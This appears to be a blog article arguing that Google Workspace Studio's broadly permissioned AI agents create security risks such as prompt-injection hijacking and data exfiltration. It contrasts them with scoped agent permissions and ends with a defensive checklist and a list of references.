Google workspace CLI
Google just made it trivially easy for any employee to build AI agents that reach into every corner of your digital workspace. Google Workspace Studio, now generally available, lets users spin up agents in minutes using plain English prompts. These agents run natively across Gmail, Drive, Docs, Sheets, and Calendar, and each user can create up to 100 of them. The pitch is productivity. The problem is that convenience-first design and security-first design are rarely the same thing.
What Google actually shipped
Workspace Studio is powered by Gemini and gives every employee the ability to build, manage, and share AI agents without writing a line of code. Agents can automate workflows across Google's entire productivity suite, connect to third-party tools like Salesforce, Jira, and Asana via pre-built connectors, and extend further through Apps Script and Vertex AI. Sharing an agent is as simple as sharing a Drive file. That last detail matters. It means agent proliferation is not gated by IT. It is gated by anyone with a Google account and a Workspace license.
The least-privilege problem
There is a well-established security principle called least privilege: every user, service, or system should only have access to the resources strictly necessary for its job. It is one of the oldest ideas in information security, and it exists because broad access means broad blast radius when something goes wrong. Google's approach inverts this. Workspace Studio agents operate across your entire suite by default. An agent built to summarize meeting notes can, in principle, also read your email, browse your Drive, and scan your calendar. The access model is permissive unless an admin has explicitly locked it down, and most admins are not yet thinking about agent-level permissions at all. This is not a theoretical concern. Varonis has noted that AI tools operating on granted permissions can unintentionally expose sensitive data when users or services have excessive access. Okta has warned that "agent sprawl," the rapid deployment of autonomous agents with unmanaged privileged identities, is already one of the primary challenges enterprises face.
What a compromised agent can actually do
The risks stop being abstract when you walk through the attack surface. An AI agent with broad Workspace access that gets hijacked, whether through prompt injection, credential theft, or a poisoned third-party connector, can do things like:
- Exfiltrate data silently. Copy entire datasets from Drive, share sensitive files to external accounts, or leak tokens and credentials through API calls. As Trend Micro has documented, indirect prompt injection can trick agents into sending memory-stored data to attacker-controlled endpoints, all without the user noticing.
- Edit documents undetected. Modify shared Docs, alter Sheets data, or insert subtle misinformation into collaborative files. Because the agent acts with the user's identity, these changes look legitimate in version history.
- Conduct social engineering at scale. Read calendar invites to understand organizational relationships, then draft and send emails that mimic internal communication patterns. A compromised agent with Gmail and Calendar access is a social engineering machine.
- Escalate its own privileges. Chain tool calls to acquire permissions beyond its intended scope, a pattern the OWASP Top 10 for Agentic Applications specifically flags as a critical attack vector.
The numbers back up the urgency. Obsidian Security reported roughly 16,200 AI-related security incidents in 2025, a 49% increase year over year, with an average breach cost of $4.8 million according to IBM.
A different model: scoped permissions by design
Not every platform takes the default-open approach. Notion, for example, scopes agent permissions explicitly. An agent gets access to specific pages or databases, granted one at a time. If you build an agent to manage a project tracker, it can see that tracker and nothing else. It cannot wander into your private notes, read your meeting transcripts, or poke around in unrelated databases. This is the "one agent, one job" philosophy. Each agent has a narrow, well-defined purpose and only the permissions required to fulfill it. The attack surface shrinks to match the job description. A compromised project-tracking agent cannot exfiltrate your HR documents because it never had access to them in the first place. The contrast is instructive. Google's model optimizes for speed of creation and breadth of capability. A scoped model optimizes for containment and predictability. Both involve tradeoffs, but when the downside of getting it wrong is automated data exfiltration at machine speed, containment should win.
The minimum security bar
McKinsey's playbook on agentic AI deployment recommends a layered approach: update governance frameworks first, establish oversight mechanisms, then implement technical controls. That is good advice for a planning document. But if your organization just woke up to find Workspace Studio already enabled, you need a more immediate checklist. Here is the minimum bar:
- Audit agent inventory. Find out how many agents exist in your org, who created them, and what they access. Google's Admin console provides some visibility, but you may need supplementary tooling for full coverage.
- Enforce least privilege. Restrict agent scopes to the minimum required for each workflow. Start with read-only access and expand only when justified. Google's own documentation recommends this approach, even if the default configuration does not enforce it.
- Require human checkpoints. No agent should be able to send external emails, share files outside the organization, or modify access permissions without a human in the loop. These are high-consequence actions that need a gate.
- Set hard spending and rate limits. Cap API call volumes and data transfer rates per agent. Anomalous spikes are often the first indicator of compromise.
- Implement kill switches. Every agent should have an immediate revocation mechanism. If something goes wrong, you need to be able to shut it down in seconds, not hours.
- Monitor like you would a human identity. AI agents should be subject to the same identity threat detection and response (ITDR) strategies you apply to human accounts. Log every action, flag anomalies, and review regularly.
- Lock down third-party connectors. Pre-built integrations with Salesforce, Jira, and other tools expand the blast radius beyond Google's ecosystem. Vet each connector and restrict which agents can use them.
- Educate your workforce. If every employee can create agents, every employee needs to understand the security implications of doing so. This is not an IT-only problem.
The real AI risk
The dominant narrative around AI risk still orbits around sentience, job displacement, and existential scenarios. These make for compelling headlines but poor threat models. The actual, present-day risk is far more mundane and far more urgent: autonomous software with broad access to sensitive systems, running at machine speed, with insufficient guardrails. Google Workspace Studio is a genuinely useful product. The ability to automate repetitive work with natural language is a real productivity gain. But useful and safe are different properties, and right now the gap between them is wider than it should be. If your organization has Workspace Studio enabled, the question is not whether to use it. It is whether your security posture is ready for what it makes possible.
References
- Google Workspace Blog, "Introducing Google Workspace Studio to automate everyday work with AI agents" (2026). https://workspace.google.com/blog/product-announcements/introducing-google-workspace-studio-agents-for-everyday-work
- UC Today, "Is Google Workspace Studio's Rollout Already Ahead of Your Governance Policy?" (2026). https://www.uctoday.com/productivity-automation/is-google-workspace-studios-rollout-already-ahead-of-your-governance-policy/
- Varonis, "Why Least Privilege Is Critical for AI Security" (2025). https://www.varonis.com/blog/why-polp-is-critical-for-ai-security
- Okta, "Why AI Agents Must Be Treated as Privileged Users" (2025). https://www.okta.com/newsroom/articles/why-ai-agents-must-be-treated-as-privileged-users/
- Trend Micro, "Unveiling AI Agent Vulnerabilities Part III: Data Exfiltration" (2025). https://www.trendmicro.com/vinfo/us/security/news/threat-landscape/unveiling-ai-agent-vulnerabilities-part-iii-data-exfiltration
- OWASP, "Top 10 Risks and Mitigations for Agentic AI Security" (2025). https://genai.owasp.org/2025/12/09/owasp-genai-security-project-releases-top-10-risks-and-mitigations-for-agentic-ai-security/
- Obsidian Security and DataBahn, "AI Agents Security Incidents and Related CVEs for Enterprise Security Teams" (2026). https://www.databahn.ai/blog/ai-agents-security-incidents-and-related-cves-for-enterprise-security-teams
- IBM, "AI Agent Security Best Practices Guide" (2025). https://www.ibm.com/think/tutorials/ai-agent-security
- McKinsey, "Deploying Agentic AI with Safety and Security: A Playbook for Technology Leaders" (2025). https://www.mckinsey.com/capabilities/risk-and-resilience/our-insights/deploying-agentic-ai-with-safety-and-security-a-playbook-for-technology-leaders
- Palo Alto Networks Unit 42, "AI Agents Are Here. So Are the Threats." (2025). https://unit42.paloaltonetworks.com/agentic-ai-threats/
- Google Cloud, "AI Agent Security: How to Protect Digital Sidekicks (and Your Business)" (2025). https://cloud.google.com/transform/ai-agent-security-how-to-protect-digital-sidekicks-and-your-business/